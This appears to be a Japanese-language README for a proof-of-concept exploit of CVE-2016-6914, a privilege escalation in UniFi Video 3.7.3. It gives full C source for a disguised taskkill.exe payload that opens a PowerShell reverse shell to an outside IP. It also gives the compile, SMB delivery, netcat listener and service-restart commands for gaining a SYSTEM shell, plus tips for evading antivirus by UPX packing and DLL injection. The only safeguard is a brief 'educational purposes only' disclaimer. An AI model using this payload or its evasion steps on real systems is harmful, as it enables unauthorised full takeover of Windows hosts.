
CVE-2016-6914-UniFiVideo-LPE
このリポジトリには、Ubiquiti UniFi Video 3.7.3 に影響するローカル権限昇格 (LPE) 脆弱性 CVE-2016-6914 の概念実証 (PoC) が含まれています。
低い権限の攻撃者は、C:\ProgramData\unifi-video\ 内の信頼されたバイナリ (taskkill.exe) を置き換えて、SYSTEM 権限で悪意のあるコードを実行できます。
1️⃣ taskkill.exe を悪意のあるペイロード (exploit.exe) に置き換えます。
2️⃣ UniFi Video Service の実行を待つか、手動で再起動します。
3️⃣ 悪意のあるペイロードが実行され、SYSTEM シェルが取得されます。
このペイロードは taskkill.exe を置き換え、リバースシェルを起動します。
#include <windows.h>
int main() {
system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
return 0;
}
✅ MinGW を使用してコンパイル: x86_64-w64-mingw32-gcc exploit.c -o exploit.exe 🛠️ 使用方法 1️⃣ SMB 共有のセットアップ (リモートファイル配信用) Kali 上で実行: impacket-smbserver share . -smb2support 2️⃣ Netcat リスナーの起動 nc -lvnp 4444 3️⃣ ターゲットマシンへのペイロード配信 ターゲットシステム上で以下の PowerShell コマンドを実行します: copy \10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe stop-service UnifiVideoService -Force start-service UnifiVideoService 4️⃣ SYSTEM シェルの取得 実行されると、リスナー上に SYSTEM シェルが開きます!
🛡️ アンチウイルス (AV) の回避 基本的な AV 検出を回避するには、以下を試してください: ✔️ 実行ファイルのパッキング (UPX): upx --best --lzma exploit.exe ✔️ system() の代わりに代替 syscall を使用。 ✔️ DLL インジェクションを使用して正規プロセスに埋め込む。
⚠️ 免責事項 📢 この PoC は教育目的のみです! 🛑 許可のない使用は違法であり、罰せられます。 👨💻 法的かつ倫理的な方法でのみ使用してください。